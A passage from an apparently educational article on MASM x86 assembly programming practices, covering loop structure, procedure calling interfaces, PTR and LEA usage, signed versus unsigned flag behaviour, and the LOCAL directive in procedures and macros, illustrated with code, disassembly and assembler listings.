   test array[esi], 1
   jnz ODD
PASS:
   add esi, TYPE DWORD
loop L1

However, they both do incrementing outside and then jump back. They make a check in the loop but the left does incrementing after the loop and the right does before the loop. For a simple logic, you may not think like this; while for a complicated problem, assembly language could lead astray to produce such a spaghetti pattern. The following is a good one, which encapsulates all logic in the loop body, concise, readable, maintainable, and efficient.

   mov ecx, LENGTHOF array
   xor esi, esi
L1: 
   test array[esi], 1
   jz PASS
   inc array[esi]
PASS:
   add esi, TYPE DWORD
loop L1

16. Loop entrance and exit

Usually preferred is a loop with one entrance and one exit. But if necessary, two or more conditional exits are fine as shown in Search2DAry with found and not-found results.

The following is a bad pattern of two-entrance, where one gets into START via initialization and another directly goes to MIDDLE. Such a code is pretty hard to understand. Need to reorganize or refactor the loop logic.

   ; do something
   je MIDDLE

   ; loop initialization
START: 
   ; do something

MIDDLE:
   ; do something
loop START

The following is a bad pattern of two-loop ends, where some logic gets out of the first loop end while the other exits at the second. Such a code is quite confusing. Try to reconsider with a label jumping to maintain one loop end.

   ; loop initialization
START2: 
   ; do something
   je NEXT
   ; do something
loop START2
   jmp DONE

NEXT:
   ; do something
loop START2
DONE:

17. Don’t change ECX in the loop body

The register ECX acts as a loop counter and its value is implicitly decremented when using the LOOP instruction. You can read ECX and make use of its value in iteration. As see in Search2DAry in the previous section, we compare the indirect operand [ESI+ECX-1] with AL. But never try to change the loop counter within the loop body that makes code hard to understand and hard to debug. A good practice is to think of the loop counter ECX as read-only.

   ; do initialization
   mov ecx, 10
L1: 
   ; do something
   mov eax, ecx                      ; fine
   mov ebx, [esi +ecx *TYPE DWORD]   ; fine
   mov ecx, edx                      ; not good 
   inc ecx                           ; not good
   ; do something
loop L1

18. When jump backward…

Besides the LOOP instruction, assembly language programming can heavily rely on conditional or unconditional jumps to create a loop when the count is not determined before the loop. Theoretically, for a backward jump, the workflow might be considered as a loop. Assume that jx and jy are desired jump or LOOP instructions. The following backward jy L2 nested in the jx L1 is probably thought of as an inner loop.

; loop initialization 
L1: 
   ; do something
 L2: 
   ; do something
 jy L2
   ; do something
jx L1

To have selection logic of if-then-else, it’s reasonable to use a foreword jump like this as branching in the jx L1iteration:

; loop initialization 
L1: 
   ; do something
 jy TrueLogic
   ; do something for false
   jmp DONE
 TrueLogic:
   ; do something for true
DONE:
   ; do something
jx L1

About procedure

Similar to functions in C/C++, we talk about some basics in assembly language’s procedure.

19. Making a clear calling interface

When design a procedure, we hope to make it as reusable as possible. Make it perform only one task without others like I/O. The procedure’s caller should take the responsibility to do input and putout. The caller should communicate with the procedure only by arguments and parameters. The procedure should only use parameters in its logic without referring outside definitions, without any:

  • Global variable and array
  • Global symbolic constant

Because implementing with such a definition makes your procedure un-reusable.

Recalling previous five FibonacciByXXX procedures, we use register ECX as both argument and parameter with the return value in EAX to make a clear calling interface:

;------------------------------------------------------------
FibonacciByXXX 
; Receives: ECX as input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------

Now the caller can do like

; Read user’s input n and save in ECX
call FibonacciByXXX
; Output or process the nth Fibonacci number in EAX

To illustrate as a second example, let’s take a look again at calling Search2DAry in the previous section. The register arguments ESI and EAX are prepared so that the implementation of Search2DAry doesn’t directly refer to the global array, ary2D.

... ...
NUM_COL = 5
NUM_ROW = 2

.code
main PROC
   mov esi, OFFSET ary2D
   mov eax, 31h 
   call Search2DAry
; See eax for search result
   exit
main ENDP

;------------------------------------------------------------
Search2DAry PROC
; Receives: EAX, a byte value to search a 2-dimensional array
;           ESI, an address to the 2-dimensional array
; Returns: EAX, 1 if found, 0 if not found
;------------------------------------------------------------
   mov  ecx,NUM_ROW        ; outer loop count
... ...
   mov  ecx,NUM_COL        ; inner loop counter
... ...

Unfortunately, the weakness is its implementation still using two global constants NUM_ROW and NUM_COL that makes it not being called elsewhere. To improve, supplying other two register arguments would be an obvious way, or see the next section.

20. INVOKE vs. CALL

Besides the CALL instruction from Intel, MASM provides the 32-bit INVOKE directive to make a procedure call easier. For the CALL instruction, you only can use registers as argument/parameter pair in calling interface as shown above. The problem is that the number of registers is limited. All registers are global and you probably have to save registers before calling and restore after calling. The INVOKE directive gives the form of a procedure with a parameter-list, as you experienced in high level languages.

When consider Search2DAry with a parameter-list without referring the global constants NUM_ROW and NUM_COL, we can have its prototype like this

;---------------------------------------------------------------------
Search2DAry PROTO, pAry2D: PTR BYTE, val: BYTE, nRow: WORD, nCol: WORD 
; Receives: pAry2D, an address to the 2-dimensional array
;           val, a byte value to search a 2-dimensional array 
;           nRow, the number of rows 
;           nCol, the number of columns
; Returns: EAX, 1 if found, 0 if not found
;---------------------------------------------------------------------

Again, as an exercise, you can try to implement this for a fix. Now you just do

INVOKE Search2DAry, ary2D, 31h, NUM_ROW, NUM_COL
; See eax for search result

Likewise, to construct a parameter-list procedure, you still need to follow the rule without referring global variables and constants. Besides, also attention to:

  • The entire calling interface should only go through the parameter list without referring any register values set outside the procedure.

21. Call-by-Value vs. Call-by-Reference

Also be aware of that a parameter-list should not be too long. If so, use an object parameter instead. Suppose that you fully understood the function concept, call-by-value and call-by-reference in high level languages. By learning the stack frame in assembly language, you understand more about the low-level function calling mechanism. Usually for an object argument, we prefer passing a reference, an object address, rather than the whole object copied on the stack memory.

To demonstrate this, let’s create a procedure to write month, day, and year from an object of the Win32 SYSTEMTIME structure.

The following is the version of call-by-value, where we use the dot operator to retrieve individual WORD field members from the DateTime object and extend their 16-bit values to 32-bit EAX:

;--------------------------------------------------------
WriteDateByVal PROC, DateTime:SYSTEMTIME
; Receives: DateTime, an object of SYSTEMTIME
;--------------------------------------------------------
   movzx eax, DateTime.wMonth
   ; output eax as month
   ; output a separator like '/' 
   movzx eax, DateTime.wDay
   ; output eax as day
   ; output a separator like '/' 
   movzx eax, DateTime.wYear
   ; output eax as year
   ; make a newline
   ret
WriteDateByVal ENDP

The version of call-by-reference is not so straight with an object address received. Not like the arrow ->, pointer operator in C/C++, we have to save the pointer (address) value in a 32-bit register like ESI. By using ESI as an indirect operand, we must cast its memory back to the SYSTEMTIME type. Then we can get the object members with the dot:

;--------------------------------------------------------
WriteDateByRef PROC, datetimePtr: PTR SYSTEMTIME
; Receives: DateTime, an address of SYSTEMTIME object
;--------------------------------------------------------
   mov esi, datetimePtr
   movzx eax, (SYSTEMTIME PTR [esi]).wMonth
   ; output eax as month
   ; output a separator like '/'
   movzx eax, (SYSTEMTIME PTR [esi]).wDay
   ; output eax as day
   ; output a separator like '/' 
   movzx eax, (SYSTEMTIME PTR [esi]).wYear
   ; output eax as year
   ; make a newline
   ret
WriteDateByRef ENDP

You can watch the stack frame of argument passed for two versions at runtime. For WriteDateByVal, eight WORD members are copied on the stack and consume sixteen bytes, while for WriteDateByRef, only need four bytes as a 32-bit address. It will make a big difference for a big structure object, though.

22. Avoid multiple RET

To construct a procedure, it’s ideal to make all your logics within the procedure body. Preferred is a procedure with one entrance and one exit. Since in assembly language programming, a procedure name is directly represented by a memory address, as well as any labels. Thus directly jumping to a label or a procedure without using CALL or INVOKE would be possible. Since such an abnormal entry would be quite rare, I am not to going to mention here.

Although multiple returns are sometimes used in other language examples, I don’t encourage such a pattern in assembly code. Multiple RET instructions could make your logic not easy to understand and debug. The following code on the left is such an example in branching. Instead, on the right, we have a label QUIT at the end and jump there making a single exit, where probably do common chaos to avoid repeated code.

MultiRetEx PROC
   ; do something 
   jx NEXTx
   ; do something
   ret

NEXTx: 
   ; do something
   jy NEXTy
   ; do something
   ret

NEXTy: 
   ; do something
   ret
MultiRetEx ENDP
SingleRetEx PROC
   ; do something 
   jx NEXTx
   ; do something
   jmp QUIT
NEXTx: 
   ; do something
   jy NEXTy
   ; do something
   jmp QUIT
NEXTy: 
   ; do something
QUIT:
   ; do common things
   ret
SingleRetEx ENDP

Object data members

Similar to above SYSTEMTIME structure, we can also create our own type or a nested:

Rectangle STRUCT
   UpperLeft COORD <>
   LowerRight COORD <>
Rectangle ENDS

.data
rect Rectangle { {10,20}, {30,50} }

The Rectangle type contains two COORD members, UpperLeft and LowerRight. The Win32 COORD contains two WORD (SHORT), X and Y. Obviously, we can access the object rect’s data members with the dot operator from either direct or indirect operand like this

; directly access
mov rect.UpperLeft.X, 11

; cast indirect operand to access
mov esi,OFFSET rect
mov (Rectangle PTR [esi]).UpperLeft.Y, 22

; use the OFFSET operator for embedded members
mov esi,OFFSET rect.LowerRight
mov (COORD PTR [esi]).X, 33
mov esi,OFFSET rect.LowerRight.Y
mov WORD PTR [esi], 55

By using the OFFSET operator, we access different data member values with different type casts. Recall that any operator is processed in assembling at static time. What if we want to retrieve a data member’s address (not value) at runtime?

23. Indirect operand and LEA

For an indirect operand pointing to an object, you can’t use the OFFSET operator to get the member’s address, because OFFSET only can take an address of a variable defined in the data segment.

There could be a scenario that we have to pass an object reference argument to a procedure like WriteDateByRef in the previous section, but want to retrieve its member’s address (not value). Still use the above rect object for an example. The following second use of OFFSET is not valid in assembling:

mov esi,OFFSET rect
mov edi, OFFSET (Rectangle PTR [esi]).LowerRight

Let’s ask for help from the LEA instruction that you have seen in FibonacciByRegLEA in the previous section. The LEA instruction calculates and loads the effective address of a memory operand. Similar to the OFFSEToperator, except that only LEA can obtain an address calculated at runtime:

mov esi,OFFSET rect
lea edi, (Rectangle PTR [esi]).LowerRight
mov ebx, OFFSET rect.LowerRight

lea edi, (Rectangle PTR [esi]).UpperLeft.Y
mov ebx, OFFSET rect.UpperLeft.Y

mov esi,OFFSET rect.UpperLeft
lea edi, (COORD PTR [esi]).Y

I purposely have EBX here to get an address statically and you can verify the same address in EDI that is loaded dynamically from the indirect operand ESI at runtime.

About system I/O

From Computer Memory Basics, we know that I/O operations from the operating system are quite slow. Input and output are usually in the measurement of milliseconds, compared with register and memory in nanoseconds or microseconds. To be more efficient, trying to reduce system API calls is a nice consideration. Here I mean Win32 API call. For details about the Win32 functions mentioned in the following, please refer to MSDN to understand.

24. Reducing system I/O API calls

An example is to output 20 lines of 50 random characters with random colors as below:

We definitely can generate one character to output a time, by using SetConsoleTextAttribute and WriteConsole. Simply set its color by

INVOKE SetConsoleTextAttribute, consoleOutHandle, wAttributes

Then write that character by

INVOKE WriteConsole,
   consoleOutHandle,    ; console output handle
   OFFSET buffer,       ; points to string
   1,                   ; string length
   OFFSET bytesWritten, ; returns number of bytes written
   0

When write 50 characters, make a new line. So we can create a nested iteration, the outer loop for 20 rows and the inner loop for 50 columns. As 50 by 20, we call these two console output functions 1000 times.

However, another pair of API functions can be more efficient, by writing 50 characters in a row and setting their colors once a time. They are WriteConsoleOutputAttribute and WriteConsoleOutputCharacter. To make use of them, let’s create two procedures:

;-----------------------------------------------------------------------
ChooseColor PROC
; Selects a color with 50% probability of red, 25% green and 25% yellow
; Receives: nothing
; Returns:  AX = randomly selected color

;-----------------------------------------------------------------------
ChooseCharacter PROC
; Randomly selects an ASCII character, from ASCII code 20h to 07Ah
; Receives: nothing
; Returns:  AL = randomly selected character

We call them in a loop to prepare a WORD array bufColor and a BYTE array bufChar for all 50 characters selected. Now we can write the 50 random characters per line with two calls here:

INVOKE WriteConsoleOutputAttribute, 
      outHandle, 
      ADDR bufColor, 
      MAXCOL, 
      xyPos, 
      ADDR cellsWritten

INVOKE WriteConsoleOutputCharacter, 
      outHandle, 
      ADDR bufChar, 
      MAXCOL, 
      xyPos, 
      ADDR cellsWritten

Besides bufColor and bufChar, we define MAXCOL = 50 and the COORD type xyPos so that xyPos.y is incremented each row in a single loop of 20 rows. Totally we only call these two APIs 20 times.

About PTR operator

MASM provides the operator PTR that is similar to the pointer * used in C/C++. The following is the PTRspecification:

  • type PTR expression
    Forces the expression to be treated as having the specified type.
  • [[ distance ]] PTR type
    Specifies a pointer to type.

This means that two usages are available, such as BYTE PTR or PTR BYTE. Let’s discuss how to use them.

25. Defining a pointer, cast and dereference

The following C/C++ code demonstrates which type of Endian is used in your system, little endian or big endian? As an integer type takes four bytes, it makes a pointer type cast from the array name fourBytes, a charaddress, to an unsigned int address. Then it displays the integer result by dereferencing the unsigned intpointer.

int main()
{
   unsigned char fourBytes[] = { 0x12, 0x34, 0x56, 0x78 };
   // Cast the memory pointed by the array name fourBytes, to unsigned int address
   unsigned int *ptr = (unsigned int *)fourBytes;
   printf("1. Directly Cast: n is %Xh\n", *ptr);
   return 0;
}

As expected in x86 Intel based system, this verifies the little endian by showing 78563412 in hexadecimal. We can do the same thing in assembly language with DWORD PTR, which is just similar to an address casting to 4-byte DWORD, the unsigned int type.

.data
fourBytes BYTE 12h,34h,56h,78h

.code
mov eax, DWORD PTR fourBytes		; EAX = 78563412h

There is no explicit dereference here, since DWORD PTR combines four bytes into a DWORD memory and lets MOVretrieve it as a direct operand to EAX. This could be considered equivalent to the (unsigned int *) cast.

Now let’s do another way by using PTR DWORD. Again, with the same logic above, this time we define a DWORDpointer type first with TYPEDEF:

DWORD_POINTER TYPEDEF PTR DWORD

This could be considered equivalent to defining the pointer type as unsigned int *. Then in the following data segment, the address variable dwPtr takes over the fourBytes memory. Finally in code, EBX holds this address as an indirect operand and makes an explicit dereference here to get its DWORD value to EAX.

.data
fourBytes BYTE 12h,34h,56h,78h
dwPtr DWORD_POINTER fourBytes

.code
mov ebx, dwPtr       ; Get DWORD address		
mov eax, [ebx]       ; Dereference, EAX = 78563412h

To summarize, PTR DWORD indicates a DWORD address type to define(declare) a variable like a pointer type. While DWORD PTR indicates the memory pointed by a DWORD address like a type cast.

26. Using PTR in a procedure

To define a procedure with a parameter list, you might want to use PTR in both ways. The following is such an example to increment each element in a DWORD array:

;---------------------------------------------------------
IncrementArray PROC, pAry:PTR DWORD, count:DWORD
; Receives: pAry  - pointer to a DWORD array
;           count - the array count
; Returns:  pAry, every vlues in pAry incremented
;---------------------------------------------------------
   mov edi,pAry
   mov ecx,count                      

 L1:
   inc DWORD PTR [edi]
   add edi, TYPE DWORD
 loop L1
   ret
IncrementArray ENDP

As the first parameter pAry is a DWORD address, so PTR DWORD is used as a parameter type. In the procedure, when incrementing a value pointed by the indirect operand EDI, you must tell the system what the type(size) of that memory is by using DWORD PTR.

Another example is the earlier mentioned WriteDateByRef, where SYSTEMTIME is a Windows defined structure type.

;--------------------------------------------------------
WriteDateByRef PROC, datetimePtr: PTR SYSTEMTIME
; Receives: DateTime, an address of SYSTEMTIME object
;--------------------------------------------------------
   mov esi, datetimePtr
   movzx eax, (SYSTEMTIME PTR [esi]).wMonth
  ... ...
   ret
WriteDateByRef ENDP

Likewise, we use PTR SYSTEMTIME as the parameter type to define datetimePtr. When ESI receives an address from datetimePtr, it has no knowledge about the memory type just like a void pointer in C/C++. We have to cast it as a SYSTEMTIME memory, so as to retrieve its data members.

Signed and Unsigned

In assembly language programming, you can define an integer variable as either signed as SBYTE, SWORD, and SDWORD, or unsigned as BYTE, WORD, and DWORD. The data ranges, for example of 8-bit, are

  • BYTE: 0 to 255 (00h to FFh), totally 256 numbers
  • SBYTE: half negatives, -128 to -1 (80h to FFh), half positives, 0 to 127 (00h to 7Fh)

Based on the hardware point of view, all CPU instructions operate exactly the same on signed and unsigned integers, because the CPU cannot distinguish between signed and unsigned. For example, when define

.data
   bVal   BYTE   255
   sbVal  SBYTR  -1

Both of them have the 8-bit binary FFh saved in memory or moved to a register. You, as a programmer, are solely responsible for using the correct data type with an instruction and are able to explain a results from the flags affected:

  • The carry flag CF for unsigned integers
  • The overflow flag OF for signed integers

The following are usually several tricks or pitfalls.

27. Comparison with conditional jumps

Let’s check the following code to see which label it jumps:

mov   eax, -1
cmp   eax, 1
ja    L1
jmp   L2

As we know, CMP follows the same logic as SUB while non-destructive to the destination operand. Using JAmeans considering unsigned comparison, where the destination EAX is FFh, i.e. 255, while the source is 1. Certainly 255 is bigger than 1, so that makes it jump to L1. Thus, any unsigned comparisons such as JA, JB, JAE, JNA, etc. can be remembered as A(Above) or B(Below). An unsigned comparison is determined by CF and the zero flag ZF as shown in the following examples:

CMP if Destination Source ZF(ZR) CF(CY)
Destination<Source 1 2 0 1
Destination>Source 2 1 0 0
Destination=Source 1 1 1 0

Now let’s take a look at signed comparison with the following code to see where it jumps:

mov   eax, -1
cmp   eax, 1
jg    L1
jmp   L2

Only difference is JG here instead of JA. Using JG means considering signed comparison, where the destination EAX is FFh, i.e. -1, while the source is 1. Certainly -1 is smaller than 1, so that makes JMP to L2. Likewise, any signed comparisons such as JG, JL, JGE, JNG, etc. can be thought of as G(Greater) or L(Less). A signed comparison is determined by OF and the sign flag SF as shown in the following examples:

CMP if Destination Source SF(PL) OF(OV)
Destination<Source: (SF != OF) -2 127 0 1
-2 1 1 0
Destination>Source: (SF == OF) 127 1 0 0
127 -1 1 1
Destination = Source 1 1 ZF=1

28. When CBW, CWD, or CDQ mistakenly meets DIV…

As we know, the DIV instruction is for unsigned to perform 8-bit, 16-bit, or 32-bit integer division with the dividend AX, DX:AX, or EDX:EAX respectively. As for unsigned, you have to clear the upper half by zeroing AH, DX, or EDX before using DIV. But when perform signed division with IDIV, the sign extension CBW, CWD, and CDQ are provided to extend the upper half before using IDIV.

For a positive integer, if its highest bit (sign bit) is zero, there is no difference to manually clear the upper part of a dividend or mistakenly use a sign extension as shown in the following example:

mov eax,1002h
cdq
mov ebx,10h
div ebx  ; Quotient EAX = 00000100h, Remainder EDX = 2

This is fine because 1000h is a small positive and CDQ makes EDX zero, the same as directly clearing EDX. So if your value is positive and its highest bit is zero, using CDQ and

XOR EDX, EDX

are exactly the same.

However, it doesn’t mean that you can always use CDQ/CWD/CBW with DIV when perform a positive division. For an example of 8-bit, 129/2, expecting quotient 64 and remainder 1. But, if you make this

mov  al, 129
cbw             ; Extend AL to AH as negative AX = FF81h
mov  bl,2
div  bl         ; Unsigned DIV, Quotient should be 7FC0 over size of AL

Try above in debug to see how integer division overflow happens as a result. If really want to make it correct as unsigned DIV, you must:

mov  al, 129
XOR  ah, ah     ; extend AL to AH as positive
mov  bl,2
div  bl         ; Quotient AL = 40h,  Remainder AH = 1

On the other side, if really want to use CBW, it means that you perform a signed division. Then you must use IDIV:

mov  al, 129    ; 81h (-127d)
cbw             ; Extend AL to AH as negative AX = FF81h
mov  bl,2
idiv bl         ; Quotient AL = C1h (-63d), Remainder AH = FFh (-1)

As seen here, 81h in signed byte is decimal -127 so that signed IDIV gives the correct quotient and remainder as above

29. Why 255-1 and 255+(-1) affect CF differently?

To talk about the carry flag CF, let’s take the following two arithmetic calculations:

mov al, 255
sub al, 1      ; AL = FE  CF = 0

mov bl, 255
add bl, -1     ; BL = FE  CF = 1

From a human being’s point of view, they do exactly the same operation, 255 minus 1 with the result 254 (FEh). Likewise, based on the hardware point, for either calculation, the CPU does the same operation by representing -1 as a two’s complement FFh and then add it to 255. Now 255 is FFh and the binary format of -1 is also FFh. This is how it has been calculated:

   1111 1111
+  1111 1111
-------------
   1111 1110

Remember? A CPU operates exactly the same on signed and unsigned because it cannot distinguish them. A programmer should be able to explain the behavior by the flag affected. Since we talk about the CF, it means we consider two calculations as unsigned. The key information is that -1 is FFh and then 255 in decimal. So the logic interpretation of CF is

  • For sub al, 1, it means 255 minus 1 to result in 254, without need of a borrow, so CF = 0
  • For add bl, -1, it seems that 255 plus 255 is resulted in 510, but with a carry 1,0000,0000b (256) out, 254 is a remainder left in byte, so CF = 1

From hardware implementation, CF depends on which instruction used, ADD or SUB. Here MSB (Most Significant Bit) is the highest bit.

  • For ADD instruction, add bl, -1, directly use the carry out of the MSB, so CF = 1
  • For SUB instruction, sub al, 1, must INVERT the carry out of the MSB, so CF = 0

30. How to determine OF?

Now let’s see the overflow flag OF, still with above two arithmetic calculations as this:

mov al, 255
sub al, 1      ; AL = FE  OF = 0

mov bl, 255
add bl, -1     ; BL = FE  OF = 0

Both of them are not overflow, so OF = 0. We can have two ways to determine OF, the logic rule and hardware implementation.

Logic viewpoint: The overflow flag is only set, OF = 1, when

  • Two positive operands are added and their sum is negative
  • Two negative operands are added and their sum is positive

For signed, 255 is -1 (FFh). The flag OF doesn’t care about ADD or SUB. Our two examples just do -1 plus -1 with the result -2. Thus, two negatives are added with the sum still negative, so OF = 0.

Hardware implementation: For non-zero operands,

  • OF = (carry out of the MSB) XOR (carry into the MSB)

As seen our calculation again:

   1111 1111
+  1111 1111
-------------
   1111 1110

The carry out of the MSB is 1 and the carry into the MSB is also 1. Then OF = (1 XOR 1) = 0

To practice more, the following table enumerates different test cases for your understanding:

Ambiguous «LOCAL» directive

As mentioned previously, the PTR operator has two usages such as DWORD PTR and PTR DWORD. But MASM provides another confused directive LOCAL, that is ambiguous depending on the context, where to use with exactly the same reserved word. The following is the specification from MSDN:

        LOCAL localname [[, localname]]…
LOCAL label [[ [count ] ]] [[:type]] [[, label [[ [count] ]] [[type]]]]…

  • In the first directive, within a macro, LOCAL defines labels that are unique to each instance of the macro.
  • In the second directive, within a procedure definition (PROC), LOCAL creates stack-based variables that exist for the duration of the procedure. The label may be a simple variable or an array containing count elements.

This specification is not clear enough to understand. In this section, I’ll expose the essential difference in between and show two example using the LOCAL directive, one in a procedure and the other in a macro. As for your familiarity, both examples calculate the nth Fibonacci number as early FibonacciByMemory. The main point delivered here is:

  • The variables declared by LOCAL in a macro are NOT local to the macro. They are system generated global variables on the data segment to resolve redefinition.
  • The variables created by LOCAL in a procedure are really local variables allocated on the stack frame with the lifecycle only during the procedure.

For the basic concepts and implementations of data segment and stack frame, please take a look at some textbook or MASM manual that could be worthy of several chapters without being talked here.

31. When LOCAL used in a procedure

The following is a procedure with a parameter n to calculate nth Fibonacci number returned in EAX. I let the loop counter ECX take over the parameter n. Please compare it with FibonacciByMemory. The logic is the same with only difference of using the local variables pre and cur here, instead of global variables previous and currentin FibonacciByMemory.

;------------------------------------------------------------
FibonacciByLocalVariable PROC USES ecx edx, n:DWORD 
; Receives: Input n
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
LOCAL pre, cur :DWORD

   mov   ecx,n
   mov   eax,1         
   mov   pre,0         
   mov   cur,0         
L1:
   add eax, pre      ; eax = current + previous     
   mov edx, cur 
   mov pre, edx
   mov cur, eax
 loop   L1

   ret
FibonacciByLocalVariable ENDP

The following is the code generated from the VS Disassembly window at runtime. As you can see, each line of assembly source is translated into machine code with the parameter n and two local variables created on the stack frame, referenced by EBP:

   231: ;------------------------------------------------------------
   232: FibonacciByLocalVariable PROC USES ecx edx, n:DWORD 
011713F4 55                   push        ebp  
011713F5 8B EC                mov         ebp,esp  
011713F7 83 C4 F8             add         esp,0FFFFFFF8h  
011713FA 51                   push        ecx  
011713FB 52                   push        edx  
   233: ; Receives: Input n
   234: ; Returns: EAX, nth Fibonacci number
   235: ;------------------------------------------------------------
   236: LOCAL pre, cur :DWORD
   237: 
   238:    mov   ecx,n
011713FC 8B 4D 08             mov         ecx,dword ptr [ebp+8]  
   239:    mov   eax,1         
011713FF B8 01 00 00 00       mov         eax,1  
   240:    mov   pre,0         
01171404 C7 45 FC 00 00 00 00 mov         dword ptr [ebp-4],0  
   241:    mov   cur,0         
0117140B C7 45 F8 00 00 00 00 mov         dword ptr [ebp-8],0  
   242: L1:
   243:    add eax,pre      ; eax = current + previous     
01171412 03 45 FC             add         eax,dword ptr [ebp-4]  
   244:    mov EDX, cur 
01171415 8B 55 F8             mov         edx,dword ptr [ebp-8]  
   245:    mov pre, EDX
01171418 89 55 FC             mov         dword ptr [ebp-4],edx  
   246:    mov cur, eax
0117141B 89 45 F8             mov         dword ptr [ebp-8],eax  
   247:    loop   L1
0117141E E2 F2                loop        01171412  
   248: 
   249:    ret
01171420 5A                   pop         edx  
01171421 59                   pop         ecx  
01171422 C9                   leave  
01171423 C2 04 00             ret         4  
   250: FibonacciByLocalVariable ENDP

When FibonacciByLocalVariable running, the stack frame can be seen as below:

Obviously, the parameter n is at EBP+8. This

add esp, 0FFFFFFF8h

just means

sub esp, 08h

moving the stack pointer ESP down eight bytes for two DWORD creation of pre and cur. Finally the LEAVEinstruction implicitly does

mov esp, ebp
pop ebp

that moves EBP back to ESP releasing the local variables pre and cur. And this releases n, at EBP+8, for STD calling convention:

ret 4

32. When LOCAL used in a macro

To have a macro implementation, I almost copy the same code from FibonacciByLocalVariable. Since no USES for a macro, I manually use PUSH/POP for ECX and EDX. Also without a stack frame, I have to create global variables mPre and mCur on the data segment. The mFibonacciByMacro can be like this:

;------------------------------------------------------------
mFibonacciByMacro MACRO n
; Receives: Input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
LOCAL mPre, mCur, mL
.data
   mPre DWORD ?
   mCur DWORD ?

.code
   push ecx
   push edx

   mov   ecx,n
   mov   eax,1         
   mov   mPre,0         
   mov   mCur,0         
mL:
   add  eax, mPre      ; eax = current + previous     
   mov  edx, mCur 
   mov  mPre, edx
   mov  mCur, eax
   loop   mL

   pop edx
   pop ecx
ENDM

If you just want to call mFibonacciByMacro once, for example

mFibonacciByMacro 12

You don’t need LOCAL here. Let’s simply comment it out:

; LOCAL mPre, mCur, mL

mFibonacciByMacro accepts the argument 12 and replace n with 12. This works fine with the following listing MASM generated:

              mFibonacciByMacro 12
0000018C           1   .data
0000018C 00000000        1      mPre DWORD ?
00000190 00000000        1      mCur DWORD ?
00000000           1   .code
00000000  51           1      push ecx
00000001  52           1      push edx
00000002  B9 0000000C       1      mov   ecx,12
00000007  B8 00000001       1      mov   eax,1
0000000C  C7 05 0000018C R  1      mov   mPre,0
     00000000
00000016  C7 05 00000190 R  1      mov   mCur,0
     00000000
00000020           1   mL:
00000020  03 05 0000018C R  1      add  eax,mPre      ; eax = current + previous
00000026  8B 15 00000190 R  1      mov edx, mCur
0000002C  89 15 0000018C R  1      mov mPre, edx
00000032  A3 00000190 R     1      mov mCur, eax
00000037  E2 E7        1      loop   mL
00000039  5A           1      pop edx
0000003A  59           1      pop ecx

Nothing changed from the original code with just a substitution of 12. The variables mPre and mCur are visible explicitly. Now let’s call it twice, like

mFibonacciByMacro 12
mFibonacciByMacro 13

This is still fine for the first mFibonacciByMacro 12 but secondly, causes three redefinitions in preprocessing mFibonacciByMacro 13. Not only are data labels, i.e., variables mPre and mCur, but also complained is the code label mL. This is because in assembly code, each label is actually a memory address and the second label of any mPre, mCur, or mL should take another memory, rather than defining an already created one:

               mFibonacciByMacro 12
 0000018C           1   .data
 0000018C 00000000        1      mPre DWORD ?
 00000190 00000000        1      mCur DWORD ?
 00000000           1   .code
 00000000  51           1      push ecx
 00000001  52           1      push edx
 00000002  B9 0000000C       1      mov   ecx,12
 00000007  B8 00000001       1      mov   eax,1         
 0000000C  C7 05 0000018C R  1      mov   mPre,0         
      00000000
 00000016  C7 05 00000190 R  1      mov   mCur,0         
      00000000
 00000020           1   mL:
 00000020  03 05 0000018C R  1      add  eax,mPre      ; eax = current + previous     
 00000026  8B 15 00000190 R  1      mov edx, mCur 
 0000002C  89 15 0000018C R  1      mov mPre, edx
 00000032  A3 00000190 R     1      mov mCur, eax
 00000037  E2 E7        1      loop   mL
 00000039  5A           1      pop edx
 0000003A  59           1      pop ecx

               mFibonacciByMacro 13
 00000194           1   .data
              1      mPre DWORD ?
FibTest.32.asm(83) : error A2005:symbol redefinition : mPre
 mFibonacciByMacro(6): Macro Called From
  FibTest.32.asm(83): Main Line Code
              1      mCur DWORD ?
FibTest.32.asm(83) : error A2005:symbol redefinition : mCur
 mFibonacciByMacro(7): Macro Called From
  FibTest.32.asm(83): Main Line Code
 0000003B           1   .code
 0000003B  51           1      push ecx
 0000003C  52           1      push edx
 0000003D  B9 0000000D       1      mov   ecx,13
 00000042  B8 00000001       1      mov   eax,1         
 00000047  C7 05 0000018C R  1      mov   mPre,0         
      00000000
 00000051  C7 05 00000190 R  1      mov   mCur,0         
      00000000
              1   mL:
FibTest.32.asm(83) : error A2005:symbol redefinition : mL
 mFibonacciByMacro(17): Macro Called From
  FibTest.32.asm(83): Main Line Code
 0000005B  03 05 0000018C R  1      add  eax,mPre      ; eax = current + previous     
 00000061  8B 15 00000190 R  1      mov edx, mCur 
 00000067  89 15 0000018C R  1      mov mPre, edx
 0000006D  A3 00000190 R     1      mov mCur, eax
 00000072  E2 AC        1      loop   mL
 00000074  5A           1      pop edx
 00000075  59           1      pop ecx

To rescue, let’s turn on this:

LOCAL mPre, mCur, mL

Again, running mFibonacciByMacro twice with 12 and 13, fine this time, we have:

              mFibonacciByMacro 12
0000018C           1   .data
0000018C 00000000        1      ??0000 DWORD ?
00000190 00000000        1      ??0001 DWORD ?
00000000           1   .code
00000000  51           1      push ecx
00000001  52           1      push edx
00000002  B9 0000000C       1      mov   ecx,12
00000007  B8 00000001       1      mov   eax,1
0000000C  C7 05 0000018C R  1      mov   ??0000,0
     00000000
00000016  C7 05 00000190 R  1      mov   ??0001,0
     00000000
00000020           1   ??0002:
00000020  03 05 0000018C R  1      add  eax,??0000      ; eax = current + previous
00000026  8B 15 00000190 R  1      mov edx, ??0001
0000002C  89 15 0000018C R  1      mov ??0000, edx
00000032  A3 00000190 R     1      mov ??0001, eax
00000037  E2 E7        1      loop   ??0002
00000039  5A           1      pop edx
0000003A  59           1      pop ecx

              mFibonacciByMacro 13
00000194           1   .data
00000194 00000000        1      ??0003 DWORD ?
00000198 00000000        1      ??0004 DWORD ?
0000003B           1   .code
0000003B  51           1      push ecx
0000003C  52           1      push edx
0000003D  B9 0000000D       1      mov   ecx,13
00000042  B8 00000001       1      mov   eax,1
00000047  C7 05 00000194 R  1      mov   ??0003,0
     00000000
00000051  C7 05 00000198 R  1      mov   ??0004,0
     00000000
0000005B           1   ??0005:
0000005B  03 05 00000194 R  1      add  eax,??0003      ; eax = current + previous
00000061  8B 15 00000198 R  1      mov edx, ??0004
00000067  89 15 00000194 R  1      mov ??0003, edx
0000006D  A3 00000198 R     1      mov ??0004, eax
00000072  E2 E7        1      loop   ??0005
00000074  5A           1      pop edx
